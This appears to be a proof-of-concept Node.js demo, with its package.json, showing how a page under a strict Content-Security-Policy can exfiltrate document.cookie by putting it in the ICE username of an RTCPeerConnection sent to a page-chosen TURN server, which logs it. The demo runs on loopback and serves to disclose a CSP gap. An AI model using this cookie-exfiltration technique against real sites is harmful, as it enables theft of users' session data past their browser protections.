import express from "express"; | |
import Turn from "node-turn"; | |
// The untrusted document the demo app serves. It is deliberately hostile: it
// reads a value it is allowed to see (document.cookie) and tries to move it
// off-origin. The page's CSP blocks fetch()/images, but the ICE username of
// an RTCPeerConnection is delivered to whatever TURN server the page names,
// and CSP's fetch directives do not govern that path.
// String.raw is equivalent to a plain template here: the markup contains no
// backslashes and no ${} placeholders.
const CODE = String.raw`<!DOCTYPE html>
<html>
<body>
<script>
//In the vulnerable scenario,
//Untrusted code has access to data like cookies that it needs to be able to use
//But shouldn't be able to send to a 3rd-party
const FLAG = document.cookie || "FLAG";
//This fails like it should.
//Also can't load images, etc.
//fetch("http://localhost:8002?" + FLAG).then(_ => console.log("Attacked!")).catch(_ => console.log("Blocked by CSP"));
//But you can establish a RTCPeerConnection to an untrusted server
new RTCPeerConnection({
iceServers: [{
urls: ["turn:127.0.0.1:3478"],
//Username field has a max length of 128 bytes, but it's trivial to connect multiple times
username: FLAG.slice(0, 127),
credential: "1"
}],
iceCandidatePoolSize: 1
});
</script>
</body>
</html>`;
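// CSP applied to the untrusted page. Keyword sources must be quoted: an
// unquoted `none` is parsed as a host-source named "none", not the 'none'
// keyword, and browsers report it as an invalid source expression.
// CSP's fetch directives (default-src, connect-src, ...) do not govern
// WebRTC/ICE traffic; the CSP Level 3 `webrtc 'block'` directive is the
// control that stops an RTCPeerConnection from reaching a page-chosen TURN
// server. It is left out here so the demo still reproduces the gap.
const UNTRUSTED_PAGE_CSP = "default-src 'none'; script-src 'unsafe-inline'";

const app = express();

// Serve the untrusted document under the policy above.
app.get("/", (req, res) => {
  res.append("Content-Security-Policy", UNTRUSTED_PAGE_CSP);
  res.send(CODE);
});

// The listen callback receives no arguments, so passing console.log directly
// only printed an empty line; log something readable instead.
app.listen(8001, () => console.log("demo app listening on http://localhost:8001"));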
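// Debug hook for the TURN server below: node-turn reports the messages it
// handles here, and a "username: ..." line is how the ICE username sent by
// the browser becomes visible to the demo.
// Errors are rethrown on purpose so a failure during the demo is loud.
function onTurnDebug(debugLevel, msg) {
  if (msg instanceof Error) {
    throw msg;
  }
  // Guard against non-string values from the library (the original code had a
  // commented-out `typeof msg` probe here); only a string can carry the line.
  if (typeof msg !== "string") {
    return;
  }
  const match = msg.match(/username: (.*)/);
  if (match) {
    console.log("Got FLAG!");
    console.log(match[1]);
  }
}

// This is the "malicious" TURN server: its only role in the demo is to
// receive the ICE/TURN handshake on loopback and print the username field.
const server = new Turn({
  authMech: "none",
  debugLevel: "ALL",
  debug: onTurnDebug,
  credentials: {
    username: "password",
  },
  listeningIps: ["127.0.0.1"],
});
server.start();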
{
  "type": "module",
  "dependencies": {
    "express": "^4.17.2",
    "node-turn": "^0.0.6"
  }
}